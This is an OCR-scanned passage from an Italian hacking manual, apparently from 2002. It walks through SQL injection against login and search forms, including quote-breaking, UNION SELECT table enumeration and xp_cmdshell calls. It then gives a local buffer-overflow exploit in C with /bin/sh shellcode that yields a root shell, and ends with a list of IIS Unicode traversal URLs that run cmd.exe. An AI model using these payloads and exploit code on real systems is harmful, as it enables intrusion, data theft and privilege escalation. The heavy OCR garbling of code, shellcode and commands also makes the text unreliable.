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e che invece questa linea ci restituisca un errore ODBC: 
ContactName=Maria%20AndersSCompanyName= ' %200R 
Di conseguenza controllando con questa linea : 
CompanyName= ' 

Potremmo ricevere l'errore che ci dice che avremmo dovuto specificare un valore per il 

ContactName. 

Questa linea : 

ContactName=BadContactName&CompanyName= ' 

potrebbe restituirvi la stessa pagina che viene restituita nel caso precedente quando non è 

stato specificato nessun valore per ContactName. 

Ad ogni modo avrebbe potuto invec4e restiurvi anche qualche cosa d'altro. 

Questo per dire che l'inserimento di valori necessita successivamente di un analisi dei valori 

restituiti al fine di riuscire a capire quale tecnica usare e queli poss'ono essere le potenzialità 

del SQL injection. 

Ad ogni modo la cosa importante è che il database ci restituisca direttamente un messaggio 
di errore. 

Chiaramente se invece di un messaggio del database ci venisse fuori un messaggio del tipo : 
Avete sbagliato a inserire il nominativo 

Significherebbe che l'input viene valutato dal programmatore e quindi passato al database 
solo in formato corretto. 

A dire il vero l'ottimale si ottiene quando di fatto a restituire il messaggio d'errore è il driver 
ODBC. 

Il più classico dei sistemi che pretende un input da un FORM e successivamente usa i dati 
inseriti dentro ad uno statement del database è sicuramente il classico sistema di LOGIN. 
Un applicazione che fa questo potrebbe usare un statement del tipo : 

SQLQuery = "SELECT Username FROM Users WHERE Username = ' " & 
strUsername & " ' AND Password = ' " & strPassword & " "' 

strAuthCheck = GetQueryResult (SQLQuery) 

If strAuthCheck = "" Then 

boolAuthenticated = False 

Else 

boolAuthenticated = True 
End If 

In pratica le due variabili strUsername e strPassword contengono il nome e la pasworde 
inserita dentro al form dall'utente. 

Come potete vedere tramite un sistema di concatenazione & vengono aggiunti gli apicetti 
prima e dopo la stringa. 

In pratica lo stetement QL interrogherebbe la tebella Users per vedere se esiste un record 

che possiede il nome dell'utente e quella password. 

Ora supponiamo che l'utente invece della password e del nome inserisse : 

Login: ' OR 
Password: ' OR 



Lo statement SQL eseguito diventerebbe : 
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SELECT Username FROM Users WHERE Username = ' 


'OR 


- ' ' AND 


Password = '' OR ' '=' ' 







Detto a parole significherebbe : 

Seleziona lo Username da ers fdove lo Username è uguale a NULL oppure NIENTE è uguale 



Esistono dei casi in cui è necessario eeguire delle funzioni di reverse engineering sulle 

applicazioni WEB partendo dai messaggi di errore restituiti dal database. 

Il primo tipo di errore che generalmente si incontra è il SYNTAX ERROR. 

Un SYNTAX ERROR indica che la query non è conforme con la struttura delle sintassi SQL 

del database. 

In quele definite come iniezioni dirette, qualsiasi argomento inseriate questa viene utilizzata 

all'interno della query SQL direttamente senza nessuna modifica. 

Proviamo ad inserire un valore legittimo terminato da uno spazio e dalla parola OR 

Se questa genera un errore allora la direct injection è possibile. 

I valori diretti possono essere dei numerici usati dentro alle specifiche WHERE, come ad 
esempio : 

SQLStrlng = "SELECT FirstName, LastName, Title FROM Employees 
WHERE Employee = " & intEmployeelD 



Oppure una keyword SQL, come ad esempio un nome di una tabella o di una colonna cme 
nell'esempio : 

SQLStrlng = "SELECT FirstName, LastName, Title FROM Employees 
ORDER BY " & strColumn 



Tutte le altre istanze sono quelle definite con il terine di 'quoted injection vulnerabilities'. 

In una quoted injection, qualsiasi agomento che inseriate possiede un chiusura tra virgolette 

grazie apunto al carattere ' preposto e inserito dopo.dall'applicazione stessa : 



In ordine per eseguire il "break out" delle virgolette e la manipolazione della query al fine di 
mantenere una sintassi valida, la vostra stringa relativa all'iniezione deve contenere una 
virgoletta singola prima di usare una parola SQL alla fine dentro ad uno statement WHERE 
che necessita di una virgoletta messa dopo. 
Come abbiamo visto prima l'inserimento alla fine di : 



permette di annullare qualsiasi cosa il programma aggiunga alla fine in quanto di fatto si 
troverebbe dopo il segno di REM. 

Le query tramite SELECT sono utilizzate per recuperare I dati da un database. 

Molte applicazioni WEB che utilizzano contenuti dinamici di qualsiasi tipo utilizzano le 

informazioni restituite da una SELECT. 

La parte della SELECT che è in grado di eseguire il filtraggio dei dati è la WHERE. 

La strada per modificare una query mediante una WHERE è quella di crearla usado una 

UNION SELECT. 

Una UNION SELECT permette query multiple SELECT che possno essere specificate 
all'internbo di un unico stement. 
Queste potrebbero sembrare a: 

SELECT CompanyName FROM Shippers WHERE 1=1 UNION ALL SELECT 



Questa estituirà un recordsets dalla prima query e insieme una seconda query. 
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ALL è necessaria per sotrarsi a certi tipi di SELECT DISTINCT e comunque non interferisce 
in nesun modo. 

E' necessario esserei sicuri che la prima query, la prima che lo sviluppatore dell'applicazione 
WEB intende eseguire, non restituisca records. 
Non esiste nessuna difficoltà. 
Vediamo il eguente codice al lavoro : 

SQLString = "SELECT FirstName, LastName, Title FROM Employees 



E usiamo la stringa per l'iniezione : 

' UNION ALL SELECT OtherField FROM OtherTable WHERE 



City = 



f f _ f t 



Questa farebbe risultare la seguente query : 

SELECT FirstName, LastName, Title FROM Employees WHERE 
• • UNION ALL SELECT OtherField FROM OtherTable WHERE 

Questo è quello che succede: il database engine naviga sulla tabella Employees, cercando 
quelle righe dove la City è settata a nothing. 

Siccome non trova righe dove City è nothing, nessun records è restituito. 
L'unico record che verrà restituito sarà dalla injected query. 

In alcuni casi, usando nothing non funzionerà dato che ci sono delle entries nella tabella 
dove nothing viene usato, o perché specificando nothing costringeremmo l'applicazione WEB 
a fare qualche cosa. 

Tutto quello che dovete fare è specificare un valore che non esista dentro alla taballa. 

Ad esempio si potrebbe specificare qualche cosa fori dall'ordinario 

Quando viene atteso un numero, zero e I numeri negativi spesso funzionano bene 

Per un argomento di testo si potrebbe usare una stringa come "NoSuchRecord", 

"NotlnTable", o la popolarre batitura di tasti"sjdhalksjhdlka". 

Alcuni server di database restituiscono delle porzioni di query contenenti l'errore di sintassi 
all'interno dei loro messaggi. 

In questo caso si potrebbe volutamente creare errori per ricevere informazioni utili sulla 
struttura del database. 

Queste sono ad esempio delle stringhe d'attacco : 

BadValue ' 
•BadValue 
' OR ' 
' OR 



9, 9,9 

Se gli errori di sintassi contengono delle parentesi aggiungete una parentesi al valore cattivo 
come parte della vostra stringa d'iniezione. 
Ad esempio : 

mySQL=" SELECT LastName, FirstName, Title, Notes, Extension FRC 



In questo modo quando iniettate il valore 

" ') UNION SELECT OtherField FROM OtherTable WHERE ( ' '- 

la seguente query viene inviata al server 



SELECT LastName, FirstName, Title, Notes, Extension FROM Employees 
WHERE (City = ' ') UNION SELECT OtherField From OtherTable WHERE 
("=") 
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U altra specifica riguarda la voce LIKE. 

Molti statement SQL utilizzano il LIKE come ad esempio : 

SQLStrlng = "SELECT FirstName, LastName, Tltle FROM Employees WHERE 



Il segno percento (%) viene usato come valore jolly, in modo tale che la WHERE per, mette 
di fare si che strLastNameSearch possa apparire in qualsiasi modo dentro LastName. 
In ordine per terminare la query dal fatto di restituire records, il vostro bad value deve essere 
qualche cosa che nessuno dei valori in LastName contiene. 

La stringa che l'applicazione WEB appende all'input degli utenti, normalmente un segno di 
percento e una virgoletta, deve essere mirrorizzata nella specifica WHERE della stringa 
d'iniezione. 

Inoltre utilizzando nothing come cattivo valore verrà creato l'argomento di LIKE uguale a 
"%%", il quale risulterà essere un wildcard completo , il quale restituirà tutti i records. 
Usando la stringa "9,9,9" potreste ricevere il messaggio : 



Too 



argvments 



supplled 



for 



procedure 



Questo significa che I dati passati dall'utente vengono utilizzati dentro ad una stored 
procedure. 

Questo in genere è quello che si può definire con il termine di 'kiss of death' per quanto 
riguarda le iniezioni SQL in quanto non esiste modo di eseguirle se i dati vengono usati 
direttamente dentro a una di queste. 

Ad ogni modo se riuscite girare intorno al syntax error, la parte di lavoro più dura è stata fatta. 
Scegliete un nome di tabella valida tra quelle qui elencate : 

MS SQL Server 

sysobjects 

syscolumns 

MS Access Server 

MSysACEs 

MSysObjects 

MSysQueries 

MSysRelationships 

Oracle 

SYS.USER_OBJECTS 
SYS.TAB 

SYS.USERTABLES 
SYS.USER_VIEWS 
SYS.ALLTABLES 
SYS.USER_TAB_COLUMNS 
SYS.USER_CONSTRAINTS 
SYS. USER TRIGGERS 



relative al sistema di database con cui pensate di avere a che fare. 

Quasi sicuramente avrete a che fare con un messaggio d'errore che sarà relativo alle 
differenze di numero di campi dentro ad una query SELECT e UNION SELECT. 
Dovrete trovare quante colonne sono richieste per creare una query valida. 
Guardate ad esempio il seguente codice : 

SQLStrlng = SELECT FirstName, LastName, EmployeelD FROM Employees 



La SELECT legittima e la stringa UNION SELECT iniettata deve avere un numero uguale di 
colonne pari a quelle della clausola WHERE. 
In questo caso tutte e due ne vogliono tre. 
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Non soltanto il numero ma anche le tipologie. 

Ad esempio se FirstName è una stringa, allora il campo corrispondente nella vostra stringa 
d'iniezione deve essere anch'esso una stringa. 

Alcuni servers, come ad esempio Oracle, sono molto restrittivi su questo. 

Altri invece sono più elastici e permettono di usare qualsiasi tipo in quanto eseguono la 

conversione. 

Per esempio in SQL Server inserendo dei valori numerici in una varchar tutto va bene dato 
che il numero verrebbe convertito in stringa. 

Inserire del testo in una colonna smallint, in ogni caso, è illegale dato che il testo non può 
essere convertito in intero 

Dato che I tipi numerici spesso sono convertiti in stringhe facilmente, ma non viceversa, usate 
quando potete valori numerici. 

Per determinare il numero dele colonne che devono essere usate, tentate aggiungendo un 
valore alla volta alla clausola UNION SELECT fino a quando vi verrà restituito un errore di 
'column number mismatch'. 

Se viene inconrato un 'type mismatch error' cambiate la tipologia dei dati della colonna.da 
numerico a litteral. 

Alcune volte riceverete un errore di conversione non appena userete una tipologia incorretta. 
Altre volte invece riceverete immediatamente degli errori relativi al numero di argomenti. 
Alcune volte il problema potrebbe derivare da delle clausole WHERE che vengono aggiunte 
dopo la vosttra stroinga dell'iniezione. 
Guardate ad esempio il codice : 

SQLString = "SELECT FirstName, LastName, Title FROM Employees WHERE 



Usando una semplice iniezione avremmo : 

SELECT FirstName, LastName, Title FROM Employees WHERE City 
='NoSuchCity' UNION ALL SELECT OtherField FROM OtherTable WHERE 1=1 



Ila quale genererebbe una segnaazione d'errore del tipo : 

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Invalid column name 



Il problema in questo caso è dovuta al fatto che la query iniettata non possiede una tabella 
all'interno del FROM che contiene la colonna 'Country'. 
Ci sono due modi di risolvere il problema: 

Il primo è appunto quello annunciato in altri capitoli e all'inizio di questo ovvero di usare il 
terminatore nel caso in cui si stia usando SQL Server, oppure prendete il nome della 
tabella ce ospita la colonna e appendetela al FROM. 

Ora che potrebbe essere possibile avere una stringa d'iniezione è necessario decidere quali 
tabelle e campi volete recuperare. 

Con SQL Server potete facilmente recuperare tutte le tabelle e le colonnedel database. 
Con Oracle e Access potreste o non potreste essere in grado di farlo in quanto questo 
dipende dai privilegi dell'account mediante il quale l'applicazione WEB accede al database. 
In SQL Server ci sono delle tabella chiamate 'sysobjects' e 'syscolumns' che permettono di 
avere determinate informazioni legate alle tabelle e ai campi presenti in un database. 
Per ricavare la lista delle tabelle potete usare la stringa d'iniezione: 



Questa ritorna il nome di tutte le tabelle definite dallutente (xtype = 'U'). 
Per avere i campi invece : 

SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects 
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Alcune applicazioni sono create per utilizzare soltanto un recordset alla volta all'interno del 
loro output. 

Potete manipolare la vostra stringa d'iniezione per avere indietro lentamente ma con 
sicurezza le informazioni desiderate. 

Questo viene eseguito aggiungendo un qualificatore alla clausola WHERE che previene dal 
fatto che alcune righe possano essere selezionate. 
Guardate ad esempio : 

' UNION ALL SELECT name, FieldTwo, FieldThr&e FROM TableOne WHERE 

i r — r 

Chiamiamo I valori di FieldOne, FieldTwo, FieldThree come "Alpha", "Beta" e "Delta" 
rispettivamente. 

La seconda stringa d'iniezione potrebbe essere : 

' UNION ALL SELECT Fi&ldOne, FieldTwo, FieldThree FROM TableOne WHERE 
FieldOne NOT IN ('Alpha') AND FieldTwo NOT IN ('Beta') AND FieldThree NOT IN 
('Delta') AND "=' 

La clausola NOT IN VALUES ci rende sicuri che le informazioni che già conoscete non 
vengano restituite nuovamente., in modo che la prossima riga nella tabella venga usata al 
loro posto. 

Questa dice questi valori dove "AlphaAlpha", "BetaBeta" e "DeltaDelta"... 

' UNION ALL SELECT FieldOne, FieldTwo, FieldThree FROM TableOne 
WHERE FieldOne NOT IN ('Alpha', 'AlphaAlpha') AND FieldTwo NOT IN 

('Beta', 'BetaBeta') AND FieldThree NOT IN ('Delta', 'DeltaDelta') 
AND ' '= ' 

Questo previene sia il primo che il secondo sets di valori. 

La parola INSERT viene usata poer inserire informazioni dentro ad un database.. 

L'uso comune all'interno di un applicazione WEB potrebbe essere legata all'iserimento dei 

dati di qualche nuovo utente registrato. 

Il controllo delle vulnerabilità dello stetement INSERT avviene allo stesso modo di quello 
WHERE. 

Prendiamo ad esempio un sito in cui si permessa la registrazione di nuovi utenti. 

In questo sarà presente un form dove potrete inserire il nome, il cognome e altri dati 

Dopo averli confermati potrete andare nella pagina dove questi sono visualizzati e quindi 

provare ad editarli. 

Per poter avere un vantaggio nella specifica INSERT, dovrete essere in grado di vedere le 
informazioni inserite 

Cercate di trovare il modo per riuscire a visualizzare tali informazioni. 
Una statement INSERT potrebbe essere : 

INSERT INTO TableName VALUES ('Value One', 'Value Two', 'Value 
Three ') 

Potreste volere di essere in grado di manipolare gli argomenti all'interno dela specifica 
VALUES in modo da poter recuperare altri dati. 
Per fare questo usate una subselects. 
Il codice potrebbe essere : 



SQLString = "INSERT 


INTO TableName VALUES 


('" & strValueOne & "', 


r rr 


& strValueTwo & 


' " & strValueThree & " 


') " 





Per poter riempire il form in questo modo: 



Name : ' 


+ (SELECT 


TOP 1 


FieldName FROM TableName) + 


'Email : 


blah@blah . 


com Phone: 


333-333- 


-3333 
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creiamo un statement SQL come questo : 

INSERT INTO TableName VALUES ( ' ' + (SELECT TOP 1 FieldName FROM 
TableName) + -, 'blah@blah.com', '333-333-3333') 

Quando poi andrete nella pagina delle preferenze nella quale è possibile vedere I dati inseriti, 
potrete vedere il primo valore in FieldName dove di fatto lo user's name dovrebbe essere 
normalmente . 

Fino a quando usate TOP 1 all'interno della vostra subselect, dovreste ricevere indietro un 
messaggio d'errore il quale vi dirà che esistono troppi records restituiti dalla subselect 
Potreste anche navigare attraverso tutte le righe della tabella usando NOT IN () allo stesso 
modo in cui vferrebbe usata all'interno di un ciclo relativo ad un unico record. 
Come abbiamo detto prima I database possono utilizzare quelle definite con il termine di 
stored procedure. 

Dentro a Microsoft SQL Server esistono centinaia di stored procedures. 

Se potete eseguire un iniezione SQL che funziona sul WEB potreste anche usare queste 

stored procedures per tirarci fuori alcuni effetti strani. 

In funzione alle permissions delle applicazioni web alcune di queste potrebbero funzionare. 
La prima cosa che dovete conoscere sulle iniezioni legate alle stored procedure è che non 
vedrete l'output da paté di queste allo stesso modo in cui avrete I dati indietro mediante l'uso 
delle normali metodologie d'iniezione. 

In funzione a quello che vorreste fare potreste non avere bisogno di avere restituiti tutti I dati. 
Potreste trovare altri modi per ricevere I dati restituiti. 

Le iniezioni delle procedure è più semplice di quanto lo sia la normale iniezione. 
Un procedure injection potrebbe essere : 

simplequoted. asp?clty=seattle ' ;EXEC master . dbo . xp_cmdshell 'cmd.exe 



Notate come un argomento valido è fornito all'inizio il quale è successivamente seguito da 
una virgoletta. 

L'argomento finale non possiede chiusure di virgolette. 

Questo soddisfa le richieste delle sintassi inerenti a molte vulnerabilità quotate. 

Potreste anche dover trattare con parentesi gli stements WHERE aggiuntivi. 

Tra le stored procedure troviamo : 

xp_cmdshell { ' command_string ' } [, no_output] 

master. dbo. xp_cmdshell è il santo grailis delle stored procedure. 

Questa vuole un singolo argomento il quale è un comando che deve essere eseguito. 

sp_makewebtask [@outputfile =] ' output file ' , [@query =] 'query' 
Un altra procedura è master.dbo.spjmakewebtask. 

Come potete vedere questa usa come argomento la locazione di un file di outpute una 
statement SQL. 

spjnakewebtask prende una query e crea una pagina web contenente il suo output. 
Notate che potete usare un pathname unicode come locazione di output. 



Un tentativo di buffer overf low eseguito localmente 

Quando abbiamo parlato negli altri capitoli di buffer overflow la domanda fondamentale era di 
dove questo inserimento di dati oltre un certo limite poteva essere eseguito. 
La risposta era di fatto ovunque il sistema operativo o un software di gestione di un severs 
prendesse l'input. 

Chiaramente gli scopi potevano essere diversificati a seconda del punto da cui si cercava di 
eseguire questa procedura. 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



Se l'attacco avveniva dall'esterno questa poteva essere orientata ad ottenere una shell dentro 
al sistema operativo. 

Se invece si fosse già all'interno, ad esempio dopo aver fatto il login come guest, lo scopo 
poteva essere quello di cercare di aumentare i privilegi, magari ottenendo una shell come 
root. 

In questa parte vedremo appunto questo caso. 

Per altre spiegazioni sulla metodologia dei buffer overflow vi rimando agli appositi capitoli che 
abbiamo visto precedentemente. 

Come ho già detto lo scopo di questo capitolo è quello d creare da dentr9o al sistema una 
shell con diritti di root. 

Supponiamo di avere ad esempio il sistema che legge la variabile d'ambiente legato al 
settaggio del terminale. 

void mairi (int argc, char **argv, char **envp) { 
char s[1024]; 
strcpy (s, getenv ( "TERM") ) ; 



Questo di fatto è un pezzo di codice reale e molti exploit si basano su questo. 
Ora supponiamo di aver definito la varabile d'ambiente : 

$ export TERM= "01234567890123456789012345678901234567890123456789012345678 
90123456789012345678901234567890123456789012345678901234567890123456789012 
34567890123456789012345678901234567890123456789012345678901234567890123456 
78901234567890123456789012345678901234567890123456789012345678901234567890 
12345678901234567890123456789012345678901234567890123456789012345678901234 
56789012345678901234567890123456789012345678901234567890123456789012345678 
90123456789012345678901234567890123456789012345678901234567890123456789012 
34567890123456789012345678901234567890123456789012345678901234567890123456 
78901234567890123456789012345678901234567890123456789012345678901234567890 
12345678901234567890123456789012345678901234567890123456789012345678901234 
56789012345678901234567890123456789012345678901234567890123456789012345678 
90123456789012345678901234567890123456789012345678901234567890123456789012 
34567890123456789012345678901234567890123456789012345678901234567890123456 
78901234567890123456789012345678901234567890123456789012345678901234567890 
123456789" 



Come avrete visto il risultato è un errore di segmentation fault. 

La variabile dentro alla procedura che dovrebbe mantenere il settaggio TERM è di 1024 bytes 
non adatto a mantenere quanto appena visto. 
Ora diamo un occhiata al programma che segue : 

$ cat simple.c 
^include <simple.h> 
^include <stdlib.h> 

void main (int argc, char **argv, char **envp) { 
char s[1024]; 

strcpy (s, getenv ( "TERM") ) ; 

} 

$ gcc simple.c -S 
$ cat simple.s 

.file "simple.c" 

. ver sion "01 . 01 " 

gcc2_compiled. : 
. section . rodata 

. LCO : 

.string "TERM" 

. text 

.align 16 
. globi main 
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. type main, Qfunction 


main : 






pushl %ebp 




movi %esp, %ebp 




subì $1024, %esp 




pushl $.LCO 




cali getenv 




addi $4, %esp 




movi %eax, leax 




pushl %eax 




leal -1024 (%ebp) , %eax 




pushl %eax 




cali strcpy 




addi $8, %esp 


.LI: 






movi %ebp, %esp 




popi %ebp 




ret 


. Lfel : 






.size main, .Lfel-main 




. ident "GCC : (GNU) 2.7.0" 



Tenete presente queste righe di codice : 



pushl %ebp 
movi %esp, %ebp 
subì $1024, %esp 




Le prima de linee sono chiamate "setting up a stack trame" e sono una parte standard del 
codice compilato mediante un compilatore C 

La terza linea serve ad allocare delle spazio nello stack per la variabile "s" all'interno del 
nostro codice C. 

Da questo codice possiamo farci un idea graficamente di come è strutturato lo stack: 



+ + -1024 (%ebp) 

I 1024 bytes / (s variabile) 

+ + 0 (%ebp) 

I ebp I 

+ + 4 (%ebp) 

I ret addr / 

+ + 8 (%ebp) 

I argc / 

+ + 12 (%ebp) 

I argv \ 

+ + 16(%ebp) 

I envp I 



Cosa avviene quando eseguiamo l'inserimento dentro alla variabile di 1024 della stringa d 
eviroment TERM ? 

Partiamo copiando a -1024(%ebp), andiamo fino -1023(%ebp) e cosi via fino a fermarci 
prima di 0(%ebp) in quanto dopo ci sono i dati relativi a EBP e il valore di ritorno dela 
chiamata ala funzione. 

Andando avanti a copiare andremmo a soprascrivere questi valori. 
Riprendiamo l'esempio di prima: 

$ export TERM=" 01234 5 67 8 90 1234 5 67 8 90 1234 5 67 8 9012 34 5 67 8 9012 34 5 67 8 9012 34 5 67 8 
90123456789012345678901234567890123456789012345678901234567890123456789012 
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34567890123456789012345678901234567890123456789012345678901234567890123456 
78901234567890123456789012345678901234567890123456789012345678901234567890 
12345678901234567890123456789012345678901234567890123456789012345678901234 
56789012345678901234567890123456789012345678901234567890123456789012345678 
90123456789012345678901234567890123456789012345678901234567890123456789012 
34567890123456789012345678901234567890123456789012345678901234567890123456 
78901234567890123456789012345678901234567890123456789012345678901234567890 
12345678901234567890123456789012345678901234567890123456789012345678901234 
56789012345678901234567890123456789012345678901234567890123456789012345678 
90123456789012345678901234567890123456789012345678901234567890123456789012 
34567890123456789012345678901234567890123456789012345678901234567890123456 
78901234567890123456789012345678901234567890123456789012345678901234567890 
123456789" 

Usiamo GDB il debugger di Linux sul programma d prima : 
$ gdb simple 

GDB is free software and you are welcome to distribute copies of it 

under certain condltions; type "show copying" to see the conditions . 
There is absolutely no warranty for GDB; type "show warranty" for 
details . 

GDB 4.14 (i486-slackware-linux) , 

Copyright 1995 Free Software Foundation, Inc. . . (no debugging symbols 
found) . . . 

(gdb) break main 
Breakpoint 1 at 0x80004e9 

(gdb) run 

Start ing program: simple 

Breakpoint 1, 0x80004e9 in main () 
(gdb) disass 

Dump of assembler code for function main: 



0x80004e0 


<main> : 


pushl 


%ebp 


0x80004el 


<main+l> : 


movi 


%esp, %ebp 


0x80004e3 


<main+3> : 


subì 


$0x400, %esp 


0x80004e9 


<main+9> : 


pushl 


$0x8000548 


0x80004ee 


<main+14> : 


cali 


0x80003d8 <getenv> 


0x80004f3 


<main+19> : 


addi 


$0x4, %esp 


0x80004f6 


<main+22> : 


movi 


%eax, %eax 


0x80004f8 


<main+24> : 


pushl 


%eax 


0x80004f9 


<main+25> : 


leal 


OxfffffcOO (%ebp) , %eax 


0x80004ff 


<main+31> : 


pushl 


%eax 


0x8000500 


<main+32> : 


cali 


0x80003c8 <strcpy> 


0x8000505 


<main+37> : 


addi 


$0x8, %esp 


0x8000508 


<main+40> : 


movi 


%ebp, %esp 


0x800050a 


<main+42> : 


popi 


%ebp 


0x800050b 


<main+43> : 


ret 




0x800050c 


<main+44> : 


nop 




0x800050d 


<main+45> : 


nop 




0x800050e 


<main+46> : 


nop 




0x800050f 


<main+47> : 


nop 





End of assembler dump. 

(gdb) break *0x800050b 
Breakpoint 2 at 0x800050b 

(gdb) cont 
Continuing . 

Breakpoint 2, 0x800050b in main () 
(gdb) stepi 

0x37363534 in fpu_control () 

(gdb) stepi 
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Program received signal SIGSEGV, Segmentation fault . 




Coma mai un segmentation fault ? 

E' semplice ... non esiste nessun codice all'indirizzo 0x37363534: 
$ gdb simple 

GDB is free software and you are welcome to distribuite copies of it 

under certain conditions; type "show copying" to see the conditions . 
There is absolutely no warranty for GDB; type "show warranty" for 
details. 

GDB 4.14 (i486-slackware-linux) , 

Copyright 1995 Free Software Foundation, Inc. . . (no debugging symbols 
found) . . . 

(gdb) break main 
Breakpoint 1 at 0x80004e9 

(gdb) run 

Start ing program: simple 



Breakpoint 1, 


0x80004e9 


in main 


0 


(gdb) info registers 






eax 


0x0 


0 




e ex 


Oxc 


12 




edx 


0x0 


0 




ebx 


0x0 


0 




esp 


0xbffff800 


0xbffff800 


ebp 


0xbffffc04 


0xbffffc04 


esi 


0x50000000 


1342177280 


edi 


Ox50001dfO 


1342184944 


eip 


0x80004ee 


0x80004ee 


ps 


0x382 


898 




cs 


0x23 


35 




ss 


0x2b 


43 




ds 


0x2b 


43 




es 


0x2b 


43 




fs 


0x2b 


43 




gs 


0x2b 


43 





(gdb) x/5xw 0xbffffc04 

0xbffffc04 < fpu_control+3087001064>: 0xbffff8e8 0x08000495 

0x00000001 0xbffffcl8 

0xbffffcl4 < fpu_control+3087001080> : 0xbffffc20 

(gdb) 



Il primo valore qui (0xbffff8e8) è quello di ebp prima che questo sia inserito nello stack. 
Il valore successivo è quello di ritorno. 

Il valore 0x00000001 è I' arge e Oxbffffd 8 è invece argv mentre infine 0xbffffc20 è envp 
A questo punto se copiamo 1024 + 8 bytes andremo a soprascrivere l'indirizzo di ritorno 
facendo in modo che questo obblighi ad eseguire un salto al nostro codice. 
Se settassimo TERM con: 

<un certo numero di nopsxil codice che esegue una shelllxlun 
indiroizzo di ritorno> 

potremmo ottenere che il software salti all'interno di un o dei NOP facendo in modo che il 
processore passi alla successiva istruzione fino a quando non incontra il codice che apre la 
shell. 

L'unico problema è indovinare il valore da inserire nell'indirizzo di ritorno. 

Il valore pefetto dovrebbe essere 0xbffff804 ma è piuttosto improbabile che possiamo avee 

questa informazione nell'istante in cui andremo scrivere un exploit reale per cui l'unica cosa è 

provare. 
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Chiaramente l'inserimento dei NOP semplifica un pò la questione. 
Questo potrebbe essere un piccolo esempio relativo al nostro caso. 



long get_ssp (void) 
{ 

asm ( "movi %esp, %eax \n ") ; 

} 

char *realegg = 

" \xeb \x24 \x5e \x8d\xle\x89 \x5e \xOb \x33 \xd2 \x89\x56\x07\x89 \x56\x0f 
" \xb8 \xlb \x56\x34 \xl2 \x35 \xl 0 \x56\x34 \xl2 \x8d\x4e \xOb \x8b \xdl \xcd 
" \x80 \x33 \xcO \x40\xcd\x80 \xe8 \xd7 \xff\xff\xff/bln/sh "; 



/*char *realegg= " \xeb \xfe \0"; */ 

char s[1034]; 
Int i; 
char *sl ; 

#define STACKFRAME (OxcOO - 0x818) 

void main(int argc,char **argv,char **envp) { 
strcpy(s, "TERM=") ; 
si = s+5; 

whils (sl<s+1028+5-strlen(realegg) ) * (sl++) =0x90; 

while (*realegg) * (sl++) =* (realegg++) ; 

* ( (unsigned long *) si) =get_esp () +1 6— 1028— STACKFRAME; 

printf("%08X\n", * ( (long *)sl)) ; 

sl+=4; 

*sl=0; 

putenv(s) ; 

systsm ( "bash ") ; 

) 



La proima cosa da fare è copiare TERM= in una stringa. 

Inseriremo inoltre un certo numero di NOP aggiungendo dopo il codice della shell. 
E quindi il valore di ritorno. 

Ora potremo chiamare putenv per settare la variabile ed eseguire la shell. 

La funzione "get_esp" prende il corretto valore di esp il qale potrebbe cambiare da macchina 

a macchina. 

Ricordiamoci che usando dei programmi localmente possiamo anche sfruttare queste funzioni 
cosa che non potremmo fare dall'esterno del sistema. 

$ ./sploit 

BFFFF418 
bash$ . /simple 
bash$ 



Ora proviamo : 



$ ls -1 simple 






-rwsr-xr-x 1 root 


root 


4032 Oct 2 18:46 simple* 


$ ./sploit 






BFFFF418 






bash$ . /simple 
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e sorpresa ... abbiamo la shell come root. 

L'unico trucco legato a questo tipo di buffer overflow è quello di riuscire a trovare il corretto 
STACKFRAME. 

Per aiutarci a fare questo possiamo usare un piccolo programma chiamato whatesp: 

long getespO { 

asm ( "movi %esp, %eax ") ; 

} 

void mairi () { 

printf("%08X\n ", getesp () +4) ; 



$ ./sploit 

BFFFF41C 

bash$ . /whatesp 

BFFFF818 

Il secondo valore che vedrete è BFFFF818 che vi dirà quale valore usare in STACK_FRAME 
(0x818). 

$ ./sploit 
BFFFF418 

bash$ gdb whatesp 

GDB is free software and you are welcome to distribute copies of it 

under certain conditions; type "show copying" to see the conditions . 
There is absolutely no warranty for GDB; type "show warranty" for 
details. 

GDB 4.14 (i486-slackware-linux) , 

Copyright 1995 Free Software Foundation, Inc. . . (no debugging symbols 
found) . . . 
(gdb) run 

Start ing program: whatesp 
BFFFF7FC 




Rimpiazzate il valore 0x818 nello STACK FRAME con 0x7fc. 



Altre stringhe legate a UNI CODE 

Nei capitoli in cui abbiamo parlato dei problemi legati ai WEB Windows abbiamo visto il 
discorso legato all'UNICODE BUG. 
Ecco un'altra serie di stringhe utilizzabili : 



/MSADC/root . exe ?/c+dir 

/PBServer/ . . %%35%63. . %%35%63. . %%35%63winnt/system32/cmd. exe?/c+dir 

/PBServer/ . . %%35c. . %%35c. . %%35cwinnt/system32/cmd.exe?/c+dir 

/PBServer/ . . %25%35%63. . %25%35%63. . %25%35%63winnt/system32/cmd.exe?/c+dir 

/PBServer/ . . %255c. . %255c. . %255cw±nnt/system32/cmd. exe?/c+dir 

/Rpc/. . %%35%63. . %%35%63. . %%35%63winnt/system32/cmd. exe?/c+dir 

/Rpc/ . . %%35c. . %%35c. . %%35cw±nnt/system32/cmd.exe?/c+d±r 

/Rpc/. . %25%35%63. . %25%35%63. . %25%35%63wlnnt/system32/cmd.exe?/c+dir 

/Rpc/. . %255c. . %255c. . %255cwinnt/system32/cmd. exe?/c+dir 

/_mem_bin/ . . %255c. ./. . %255c. ./. . %255c. . /winnt/system32/cmd. exe?/c+dir 

/_vti_bin/. . %%35%63. . %%35%63. . %%35%63. . %%35%63. . %%35%63. . /winnt/system32/cmd 

. exe? '/ 'c+dir 
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Z_vti_binZ. . %25%35%63. . %25%35%63. . %25%35%63. . %25%35%63. . %25%35%63. . /winnt/sy 
stem32/cmd. exe? Z c+dir 

Z_vti_binZ . . %255c. . %255c. . %255c. . %255c. . %255c. . /wlnnt/system32/cmd. exe?/c+dl 
r 

/_vt±_b±n/ . . %255c. ./. . %255c. ./. . %255c. . /w±nnt/system32/cmd. exe?/c+d±r 
Z_vti_binZ . . %cO%af. . %cO%af. . %cO%af. . %cO%af. . %cO%af. . /winnt/system32/cmd. exe? 
/c+dir 

/_vtl_bln/ . . %cO%af. ./. . %cO%af. ./. . %cO%af. . ZwinntZ sy stem32Zcmd.exe? Z c+dir 
Z_vti_cnfZ ■ . %255c. . %255c. . %255c. . %255c. . %255c. . %255cwinnt/system32/cmd. exe?/ 
c+dir 

/_vti_cnf/ . . %cO%af. . %cO%af. . %cO%af. . %cO%af. . %cO%af. . /winnt/sy stem32/ cmd. exe? 
/c+dir 

